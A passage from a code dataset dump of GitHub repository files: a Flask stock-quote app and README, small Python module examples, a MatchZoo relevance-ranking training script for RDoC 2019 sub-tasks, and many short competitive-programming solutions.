str(get_eps_upside()) + \"%\",\n \"eps_estimate_current_year\": parse_yahoo(\"EPSEstimateCurrentYear\"),\n \"eps_estimate_next_year\": parse_yahoo(\"EPSEstimateNextYear\"),\n \"eps_estimate_next_quarter\": parse_yahoo(\"EPSEstimateNextQuarter\"),\n \"pe_ratio\": parse_yahoo(\"PERatio\"),\n 
\"peg_ratio\": parse_yahoo(\"PEGRatio\"),\n \"news\": get_news(),\n \"stocktwits_feed\": parse_stocktwits_feed(),\n }\n return render_template(\"index.html\", stock=stock)\n\nif __name__ == '__main__':\n app.run()\n" }, { "alpha_fraction": 0.7437499761581421, "alphanum_fraction": 0.75, "avg_line_length": 22.52941131591797, "blob_id": "62e4df519ab39973ac7ac30b50b02ea1e6d426ba", "content_id": "0a558d4356d0db1d145fed634955063863265e8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 800, "license_type": "no_license", "max_line_length": 109, "num_lines": 34, "path": "/README.md", "repo_name": "kennandavison/flask-stock-quote", "src_encoding": "UTF-8", "text": "### flask-stock-quote\n\n- Heroku App: stockquoter.kennandavison.com\n- Description: GET a stock quote and automate price upside/EPS upside calculation (and a few other things)...\n\n### Implemented Features\n- Stock Search\n- Automated EPS and Price Upside Calculation\n- News & Media\n- Analyst Estimates\n- StockTwits Feed\n\n### Future Features\n- Multiple Stock Quote (compare upsides)\n- Twitter Feed/MarketBeat API\n- D3 Visualizations\n- Portfolio\n- Quantopian Algorithms (in development...)\n- Swap Stock Data Source\n- Real-time Data (using Celery + Redis to update)\n\n### Tech Stack\n- Flask\n- Python\n\n### Full Installation\n\nPackage Installation: pip install -r requirements.txt (make sure to be in same directory)\n\nRunning App: python app.py\n\n### REST Commands\n\nGET: https://localhost:5000/aapl - AAPL Quote\n" } ]
3
Architect0711/PythonReference
https://github.com/Architect0711/PythonReference
b6ef3e3e5c488a677592b35e2a53d4930cb261ad
c96a745aa5bf407c843e6e6f8e2b0cc300d98379
6c88cc70c2d3bec27b7a82d065eb69919621c206
refs/heads/master
2021-08-15T17:24:43.324099
2021-04-20T21:25:03
2021-04-20T21:25:03
249,081,252
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6133333444595337, "alphanum_fraction": 0.653333306312561, "avg_line_length": 24, "blob_id": "a08c2897c72a9249bb55afe185c730831d336de8", "content_id": "80dbfc487611caddb4d1dccb525c0e48d283c5f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 75, "license_type": "permissive", "max_line_length": 42, "num_lines": 3, "path": "/OOP/my_module_folder/__init__.py", "repo_name": "Architect0711/PythonReference", "src_encoding": "UTF-8", "text": "__all__ = [ \"my_submodule_1\" ]\n\nfrom .my_submodule_1 import my_submodule_1\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6565656661987305, "avg_line_length": 24, "blob_id": "771af40e90899cb125140dc8dfc3e96880b00d09", "content_id": "35f7c32122a3c2d322b59ef13e72506243c0122a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 99, "license_type": "permissive", "max_line_length": 46, "num_lines": 4, "path": "/OOP/my_module_folder/my_submodule_1.py", "repo_name": "Architect0711/PythonReference", "src_encoding": "UTF-8", "text": "class my_submodule_1():\n\n def do_something(self):\n print(\"my_submodule_1 does something\")" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 20, "blob_id": "8a7e7a5b2d27684c5c7ced47482a3949feafeaa3", "content_id": "5b30fd496b963e697aa8e0003029d891d7b46554", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "permissive", "max_line_length": 33, "num_lines": 5, "path": "/OOP/my_module.py", "repo_name": "Architect0711/PythonReference", "src_encoding": "UTF-8", "text": "def method_1():\n print(\"my_module.method_1()\")\n \ndef method_2():\n print(\"my_module.method_2()\")" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 54, "blob_id": 
"eaaff597ee58838a97bfdfdd224e2169afd872b1", "content_id": "02a03a8f2db7a6db7d698ee66050daed4df1974c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 110, "license_type": "permissive", "max_line_length": 91, "num_lines": 2, "path": "/README.md", "repo_name": "Architect0711/PythonReference", "src_encoding": "UTF-8", "text": "# PythonReference\nHelping me memorize what I learned and build a pallet of code snippets while I learn Python\n" } ]
4
thepanacealab/RDoC-Shared-sub-tasks-2019
https://github.com/thepanacealab/RDoC-Shared-sub-tasks-2019
488f172c562c8dedd1e7d1e6fae7bc54d2e9d666
9782250affe1ced7fab826db5df92d28e0eecdb8
1dff9be46ad48b35518de0b02417ac11619b3f94
refs/heads/master
2020-05-29T08:56:31.539402
2019-06-10T22:20:31
2019-06-10T22:20:31
189,044,586
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7055005431175232, "alphanum_fraction": 0.7244848012924194, "avg_line_length": 29.06341552734375, "blob_id": "5151d1d51ed8df407d40697c0510a317ebdd1d61", "content_id": "cc9abae2a02659081fb68458fda9e8333608da85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6163, "license_type": "no_license", "max_line_length": 117, "num_lines": 205, "path": "/relevance.py", "repo_name": "thepanacealab/RDoC-Shared-sub-tasks-2019", "src_encoding": "UTF-8", "text": "import typing\nfrom pathlib import Path\nimport pandas as pd\nimport matchzoo as mz\nimport keras\nimport numpy as np\n\n\n\ndef load_data(path: str = 'train.csv') -> typing.Union[mz.DataPack, typing.Tuple[mz.DataPack, list]]:\n\tdata_pack = mz.pack(pd.read_csv(path, index_col=0,error_bad_lines=False))\n\n\tdata_pack.relation['label'] = data_pack.relation['label'].astype('float32')\n\t#print(len(data_pack))\n\treturn data_pack\n\n\n\n######################\ntrain_path='new_train.csv'\nvalid_path='new_dev.csv'\n######################\n\ntrain_pack = load_data(train_path)\nvalid_pack = load_data(valid_path)\n#predict_pack = load_data('test.csv')\n\n'''\npreprocessor = mz.preprocessors.DSSMPreprocessor()\nranking_task = mz.tasks.Ranking(loss=mz.losses.RankCrossEntropyLoss(num_neg=4))\ntrain_processed = preprocessor.fit_transform(train_pack)\nvalid_processed = preprocessor.transform(valid_pack)\n\n\n\nranking_task.metrics = [\n mz.metrics.NormalizedDiscountedCumulativeGain(k=3),\n mz.metrics.NormalizedDiscountedCumulativeGain(k=5),\n mz.metrics.MeanAveragePrecision()\n]\n\n\nmodel = mz.models.DSSM()\nmodel.params['input_shapes'] = preprocessor.context['input_shapes']\nmodel.params['task'] = ranking_task\nmodel.params['mlp_num_layers'] = 3\nmodel.params['mlp_num_units'] = 300\nmodel.params['mlp_num_fan_out'] = 128\nmodel.params['mlp_activation_func'] = 
'relu'\nmodel.guess_and_fill_missing_params()\nmodel.build()\nmodel.compile()\n\n\ntrain_generator = mz.PairDataGenerator(train_processed, num_dup=1, num_neg=4, batch_size=64, shuffle=True)\n\nvalid_x, valid_y = valid_processed.unpack()\nevaluate = mz.callbacks.EvaluateAllMetrics(model, x=valid_x, y=valid_y, batch_size=len(pred_x))\n\nhistory = model.fit_generator(train_generator, epochs=20, callbacks=[evaluate], workers=5, use_multiprocessing=False)\n'''\n\npreprocessor = mz.preprocessors.BasicPreprocessor(remove_stop_words=True)\n#ranking_task = mz.tasks.Ranking(loss=mz.losses.RankHingeLoss())\n#preprocessor = mz.preprocessors.DSSMPreprocessor()\nranking_task = mz.tasks.Ranking(loss=mz.losses.RankCrossEntropyLoss())\ntrain_processed = preprocessor.fit_transform(train_pack)\ntest_processed = preprocessor.transform(valid_pack)\n\n\n\nranking_task.metrics = [\n mz.metrics.NormalizedDiscountedCumulativeGain(k=3),\n mz.metrics.NormalizedDiscountedCumulativeGain(k=5),\n mz.metrics.MeanAveragePrecision()\n]\n\n#x = int(input('Enter a number1: '))\n\nmodel = mz.models.CDSSM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['filters'] = 64\nmodel.params['conv_activation_func'] = 'relu'\nmodel.params['optimizer'] = 'adam'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n\n'''\nmodel = mz.models.ConvKNRM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\n#model.params['embedding_output_dim'] = 300\nmodel.params['embedding_trainable'] = True\nmodel.params['filters'] = 128 \nmodel.params['conv_activation_func'] = 'tanh' \nmodel.params['max_ngram'] = 3\nmodel.params['use_crossmatch'] = True \nmodel.params['kernel_num'] = 11\nmodel.params['sigma'] = 0.1\nmodel.params['exact_sigma'] = 0.001\nmodel.params['optimizer'] = 'adadelta'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = 
mz.models.ArcII()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['embedding_output_dim'] = 100\nmodel.params['embedding_trainable'] = True\nmodel.params['num_blocks'] = 2\nmodel.params['kernel_1d_count'] = 32\nmodel.params['kernel_1d_size'] = 3\nmodel.params['kernel_2d_count'] = [64, 64]\nmodel.params['kernel_2d_size'] = [3, 3]\nmodel.params['pool_2d_size'] = [[3, 3], [3, 3]]\nmodel.params['optimizer'] = 'adam'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = mz.models.KNRM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['embedding_trainable'] = True\nmodel.params['kernel_num'] = 11\nmodel.params['sigma'] = 0.1\nmodel.params['exact_sigma'] = 0.001\nmodel.params['optimizer'] = 'adadelta'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = mz.models.DUET()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['embedding_output_dim'] = 300\nmodel.params['lm_filters'] = 32\nmodel.params['lm_hidden_sizes'] = [32]\nmodel.params['dm_filters'] = 32\nmodel.params['dm_kernel_size'] = 3\nmodel.params['dm_d_mpool'] = 4\nmodel.params['dm_hidden_sizes'] = [32]\nmodel.params['dropout_rate'] = 0.5\nmodel.params['optimizer'] = 'adagrad'\nmodel.guess_and_fill_missing_params()\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = mz.models.MVLSTM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['embedding_output_dim'] = 300\nmodel.params['lstm_units'] = 50\nmodel.params['top_k'] = 20\nmodel.params['mlp_num_layers'] = 2\nmodel.params['mlp_num_units'] = 10\nmodel.params['mlp_num_fan_out'] = 5\nmodel.params['mlp_activation_func'] = 'relu'\nmodel.params['dropout_rate'] = 0.5\nmodel.params['optimizer'] = 'adadelta'\nmodel.guess_and_fill_missing_params()\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = 
mz.models.DSSM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['mlp_num_layers'] = 3\nmodel.params['mlp_num_units'] = 300\nmodel.params['mlp_num_fan_out'] = 128\nmodel.params['mlp_activation_func'] = 'relu'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n'''\n\n#x, y = train_processed.unpack()\npred_x, pred_y = test_processed.unpack()\n#model.fit(x, y, batch_size=32, epochs=5)\n\n\nevaluate = mz.callbacks.EvaluateAllMetrics(model, x=pred_x, y=pred_y, batch_size=len(pred_y))\nprint(len(pred_y))\nx = int(input('Enter a number2: '))\n#data_generator = mz.DataGenerator(train_processed, batch_size=x)\ndata_generator = mz.PairDataGenerator(train_processed, batch_size=x, shuffle=True)\nprint('num batches:', str(len(data_generator)))\nx = int(input('Enter a number3: '))\nhistory= model.fit_generator(data_generator, epochs=x, callbacks=[evaluate], use_multiprocessing=True, workers=4)\n\n#x = int(input('Enter a number4: '))\nmodel.save('my-model')\n" }, { "alpha_fraction": 0.7585421204566956, "alphanum_fraction": 0.7881549000740051, "avg_line_length": 60.71428680419922, "blob_id": "ea4d8fb14eef25de69bfead7f8d577c353869ffa", "content_id": "8763ff3729ad86b4e4fb718e2acd17ccdae79e16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 439, "license_type": "no_license", "max_line_length": 149, "num_lines": 7, "path": "/README.md", "repo_name": "thepanacealab/RDoC-Shared-sub-tasks-2019", "src_encoding": "UTF-8", "text": "This project contains useful source codes for:\n 1.creating datasets for RDoC 2019 sub-tasks\n 2. 
performing the sub-tasks using deep learning approaches.\n \n Link for competition webpage containing extra information about sub-task: https://sites.google.com/view/rdoc-task/task\n \n Link of relevant and non-relevant abstracts for RDoC constructs: https://drive.google.com/file/d/1c3CK13cOqu_jzxGeLSCsKN1mb0k6vDJg/view?usp=sharing \n \n \n" } ]
2
k0malSharma/Competitive-programming
https://github.com/k0malSharma/Competitive-programming
2539430fac8c07769dc801395f026c1d282c3b2f
141cc84bd31c2cf304a92f01776a5d97c51144c5
b1e4e980267755f39b7933165f337006229c2d31
refs/heads/master
2021-07-10T17:44:38.367630
2020-09-01T11:38:03
2020-09-01T11:38:03
194,213,890
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.3459915518760681, "alphanum_fraction": 0.39240506291389465, "avg_line_length": 22.700000762939453, "blob_id": "b5b21a756e968d713caaff5b5b421d065205f4bc", "content_id": "1225f500d793e9ab7cfdad765ab2ab15f9bf4593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/PLMU.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n x,y,c=0,0,0\n for i in range(n):\n if(a[i]==0):\n x+=1\n if(a[i]==2):\n y+=1\n print(x*(x-1)//2+y*(y-1)//2)\n" }, { "alpha_fraction": 0.46875, "alphanum_fraction": 0.4765625, "avg_line_length": 20.33333396911621, "blob_id": "4b15019dee73ef23ad1eb4c5e2867640e7c6b061", "content_id": "9116a22294f5ab6bb571234340b08d945c955f41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 128, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/UWCOI20A.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[0]*n\n for i in range(n):\n a[i]=int(input())\n print(max(a))\n" }, { "alpha_fraction": 0.4251627027988434, "alphanum_fraction": 0.43600866198539734, "avg_line_length": 22.049999237060547, "blob_id": "074536d15c6d73644bb0ee18eaa405b1f66861e4", "content_id": "21be87f5933c9f5a7036d6df6992de29abc9e979", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 39, "num_lines": 20, "path": "/ATTND.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=[]\n copy = []\n for i in range(n):\n s.append(input())\n 
copy.append(s[i].split()[0])\n copy = sorted(copy)\n repeated = []\n j = 1\n for i in copy:\n if i in copy[j:]:\n repeated.append(i)\n j+=1\n for i in range(n):\n if s[i].split()[0] in repeated:\n print(s[i])\n else:\n first = s[i].split()\n print(first[0])\n" }, { "alpha_fraction": 0.3566666543483734, "alphanum_fraction": 0.3866666555404663, "avg_line_length": 20.69230842590332, "blob_id": "398a876c670243ab56ce1fc87a051245a8076fe5", "content_id": "3375648dfdd5d07fbb3a227984ba988ccf326382", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 300, "license_type": "no_license", "max_line_length": 51, "num_lines": 13, "path": "/WATSCORE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n p=[0]*n\n s=[0]*n\n a=[0]*11\n add=0\n for i in range(n):\n p[i],s[i]=[int(j) for j in input().split()]\n if(a[p[i]-1]<s[i]):\n a[p[i]-1]=s[i]\n for i in range(8):\n add+=a[i]\n print(add)\n \n \n" }, { "alpha_fraction": 0.5268816947937012, "alphanum_fraction": 0.5376344323158264, "avg_line_length": 30, "blob_id": "3fe8fd8750d84f5f43b600ad7bf02aeeda4b0a45", "content_id": "671332693fc71368b3545e1ce3a5714515e38c33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 41, "num_lines": 3, "path": "/OMWG.PY", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,m=[int(i) for i in input().split()]\n print(2*m*n-m-n)\n" }, { "alpha_fraction": 0.34876543283462524, "alphanum_fraction": 0.3641975224018097, "avg_line_length": 20.35714340209961, "blob_id": "c5ae590c6fbaf06ae977e0bb2e99064669ad7df0", "content_id": "3b7c8ebffaa929cc47447b87bc430157da60dc0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": 
"no_license", "max_line_length": 41, "num_lines": 14, "path": "/DIET.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n r,p=0,-1\n for i in range(n):\n r+=a[i]\n r-=k\n if(r<0):\n p=i+1\n break\n if(p==-1):\n print(\"YES\")\n else:\n print(\"NO \",p)\n \n \n" }, { "alpha_fraction": 0.37106919288635254, "alphanum_fraction": 0.4150943458080292, "avg_line_length": 30.799999237060547, "blob_id": "a551cc23da9aa0e3cc9428783caf511b22ee1617", "content_id": "a1e244fb5a602af4e58b7fba20a82fbca3013286", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 56, "num_lines": 10, "path": "/BIGSALE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n amt=0\n p,q,d,m,l=[0]*n,[0]*n,[0]*n,[0]*n,[0]*n\n for i in range(n):\n p[i],q[i],d[i]=[int(i) for i in input().split()]\n m[i]=p[i]+((d[i]/100)*p[i])\n l[i]=m[i]-((d[i]/100)*m[i])\n amt+=(p[i]-l[i])*q[i]\n print('{0:.5f}'.format(amt))\n" }, { "alpha_fraction": 0.3295964002609253, "alphanum_fraction": 0.3632287085056305, "avg_line_length": 23.77777862548828, "blob_id": "8e90cc38838f5d160ceeb6ce7978a0449af0bce8", "content_id": "e5ec4148d59a9f05835d3bccfc87b967d426d67a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 446, "license_type": "no_license", "max_line_length": 47, "num_lines": 18, "path": "/HILLS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,u,d=[int(i) for i in input().split()]\n h=[int(i) for i in input().split()]\n k=1\n p=1\n for i in range(n-1):\n if((h[i]+u)>=h[i+1] and h[i]<h[i+1]):\n k+=1\n elif((h[i]-d)<=h[i+1] and h[i]>h[i+1]):\n k+=1\n 
elif(h[i]==h[i+1]):\n k+=1\n elif(h[i]-d>h[i+1] and p==1):\n k+=1\n p-=1\n else:\n break;\n print(k)\n" }, { "alpha_fraction": 0.4581005573272705, "alphanum_fraction": 0.46927374601364136, "avg_line_length": 16.899999618530273, "blob_id": "bc7dce32e1e20494757a6aa1a844bea959c77468", "content_id": "5d6e241643af6129767a79b2e5a4e0e9ac3cba9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 44, "num_lines": 10, "path": "/SINS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def gcd(x,y):\n if(x==0):\n return(y)\n return gcd(y%x,x)\n\n \nfor _ in range(int(input())):\n a, b = [int(i) for i in input().split()]\n c=gcd(a,b)\n print(2*c)\n" }, { "alpha_fraction": 0.3478260934352875, "alphanum_fraction": 0.35805627703666687, "avg_line_length": 19.578947067260742, "blob_id": "aed6b3a77a30482917d13f94c3ea9b6f0d2c54a6", "content_id": "daf703ad5267e2aa8e5b620aeeeea60c76df3d3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 39, "num_lines": 19, "path": "/COVIDLQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=True\n for i in range(n):\n if a[i]==1:\n c=i\n break\n for i in range(c+1,n):\n if a[i]==1:\n if i-c<6:\n b=False\n break\n else:\n c=i\n if b:\n print(\"YES\")\n else:\n print(\"NO\")\n" }, { "alpha_fraction": 0.4145728647708893, "alphanum_fraction": 0.4396984875202179, "avg_line_length": 25.53333282470703, "blob_id": "5a52af7310543e69ea6d789b2fbc8f12f3f90571", "content_id": "0bfcd6078d14572b41d9089c4dcdd87b65a680ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 41, 
"num_lines": 15, "path": "/DEPCHEF.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n = int(input())\n a = [int(i) for i in input().split()]\n d = [int(i) for i in input().split()]\n stat = [a[1]+a[n-1]]\n for i in range(1,n-1):\n stat.append(a[i-1]+a[i+1])\n stat.append(a[n-2]+a[0])\n ct = 0\n maxx = -1\n for i in range(n):\n if stat[i] < d[i]:\n if maxx < d[i]:\n maxx = d[i]\n print(maxx)\n" }, { "alpha_fraction": 0.3455657362937927, "alphanum_fraction": 0.3669724762439728, "avg_line_length": 19.399999618530273, "blob_id": "7dbab4df38f452b11032deb248c1d460fd86e0c7", "content_id": "bbcc629db9e02f858f1d9d67cfba22540b5d73e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/CODERLIF.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=[int(i) for i in input().split()]\n c=0\n for i in a:\n if(i==1):\n c+=1\n else:\n c=0\n if(c==6):\n c=-1\n break\n if(c!=-1):\n print(\"#allcodersarefun\")\n else:\n print(\"#coderlifematters\")\n \n" }, { "alpha_fraction": 0.32594937086105347, "alphanum_fraction": 0.34493669867515564, "avg_line_length": 20.066667556762695, "blob_id": "61765e0e50a3c51de6d7d1d8eda0693105f11f1b", "content_id": "04cf05a3e1ba14b866702eb698f4c419b22b31ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 316, "license_type": "no_license", "max_line_length": 43, "num_lines": 15, "path": "/CATSDOGS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n c,d,l=[int(i) for i in input().split()]\n if(l%4!=0 or l<(d*4)):\n print(\"no\")\n else:\n m=0\n l//=4\n if(c>d*2):\n m=c-d\n else:\n m=d\n if(m<=l and l<=(c+d)):\n print(\"yes\")\n else:\n 
print(\"no\")\n" }, { "alpha_fraction": 0.28921568393707275, "alphanum_fraction": 0.3235294222831726, "avg_line_length": 16, "blob_id": "32b896c7cacde10ac52530b62af17a5d9d20ce92", "content_id": "590775f5deaa054e7db715d93b0e8fe9a9236771", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 204, "license_type": "no_license", "max_line_length": 29, "num_lines": 12, "path": "/XYSTR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n i=0\n p=0\n while(i<((len(s)-1))):\n if(s[i]!=s[i+1]):\n i+=1\n p+=1\n else:\n pass\n i+=1\n print(p)\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.4628099203109741, "avg_line_length": 25.88888931274414, "blob_id": "d36c2eb6a6405176d82673930d05e2eb0e8a569f", "content_id": "37138eebcc8bd008730534aa0e2eaf98c66d91fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 39, "num_lines": 9, "path": "/MDL.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=[int(i) for i in a]\n a.sort(reverse=True)\n for i in b:\n if(i==a[0] or i==a[n-1]):\n print(i,end=\" \")\n print(\"\\n\",end=\"\")\n" }, { "alpha_fraction": 0.38297873735427856, "alphanum_fraction": 0.41033434867858887, "avg_line_length": 16.3157901763916, "blob_id": "006d36fcc4e4f7dffe8d81e04d507bdb1c3028ee", "content_id": "68e5340340e744160a5c77d7e399ae6e0dd8601c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 37, "num_lines": 19, "path": "/TWTCLOSE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n,k=[int(i) for i in 
input().split()]\ns=[False]*n\na=[]\nfor i in range(k):\n x=input().split()\n if (len(x)==2):\n a.append(int(x[1]))\n else:\n a.append(-1)\nfor i in a:\n if(i==-1):\n s=[0]*n\n else:\n s[i-1]=not s[i-1]\n c=0\n for j in s:\n if(j==True):\n c+=1\n print(c)\n" }, { "alpha_fraction": 0.5653846263885498, "alphanum_fraction": 0.5692307949066162, "avg_line_length": 24.5, "blob_id": "51db943119295b3bedff946a413edfa5f3ae52bc", "content_id": "8638a57ef8f937f10143a3c7f6c58aa218ac01c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 52, "num_lines": 10, "path": "/USANBOLT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor q in range(int(input())):\n bolt,tiger,a,v=[int(i) for i in input().split()]\n tiger+=bolt\n time_bolt=bolt/v\n time_tiger=math.sqrt((2*tiger)/a)\n if(time_bolt<time_tiger):\n print(\"Bolt\")\n else:\n print(\"Tiger\")\n \n" }, { "alpha_fraction": 0.3350515365600586, "alphanum_fraction": 0.39175257086753845, "avg_line_length": 22.375, "blob_id": "b84ef6057d9f52c03655a523aaad04b611c7ae12", "content_id": "d5d0ee24273d512eaf1f67d70d3bebfb3bed17b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/LAPIN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n a=[0]*26\n b=[0]*26\n for i in range(0,len(s)//2):\n a[ord(s[i])-97]+=1\n if(len(s)%2==0):\n for i in range(len(s)//2,len(s)):\n b[ord(s[i])-97]+=1\n else:\n for i in range(len(s)//2+1,len(s)):\n b[ord(s[i])-97]+=1\n if(a==b):\n print(\"YES\")\n else:\n print(\"NO\")\n \n \n" }, { "alpha_fraction": 0.3827493190765381, "alphanum_fraction": 0.39083558320999146, "avg_line_length": 23.733333587646484, "blob_id": 
"8c3974655a7bf263b11830d1d3f7fa09d272b665", "content_id": "3764a5f2cd8ce1da507b2397c87e6aa4bbcad243", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 371, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/FRGTNLNG.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n s=input().split()\n a,m=[],[0]*n\n for i in range(k):\n a=input().split()\n for j in range(n):\n if s[j] in a:\n m[j]=1\n for i in m:\n if(i==1):\n print(\"YES\",end=' '),\n else:\n print(\"NO\",end=' '),\n print(end='\\n')\n" }, { "alpha_fraction": 0.3304157555103302, "alphanum_fraction": 0.35886213183403015, "avg_line_length": 20.761905670166016, "blob_id": "7e35cf7f4a0a2c344c612a4e9029666a09555d10", "content_id": "c0c1e4510ba8505522a05bb7577d0c28772e9239", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 457, "license_type": "no_license", "max_line_length": 39, "num_lines": 21, "path": "/RAINBOWA.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n k=n-1\n flag=0\n a=[int(i) for i in input().split()]\n s=[1,2,3,4,5,6,7]\n st=list(set(a))\n print(s,\" \",st)\n if(s==st):\n for i in range(n//2):\n print(a[i],\" \",a[k])\n if(a[i]!=a[k]):\n flag=1\n break; \n k-=1\n if(flag==0):\n print(\"yes\")\n else:\n print(\"no\")\n else:\n print(\"no\")\n" }, { "alpha_fraction": 0.443113774061203, "alphanum_fraction": 0.46706587076187134, "avg_line_length": 17.33333396911621, "blob_id": "817b7b60e28d45300b02fa08c2728984327cb794", "content_id": "029ba6187b88b0162b8c131007e316e7f500aee7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 34, "num_lines": 9, "path": 
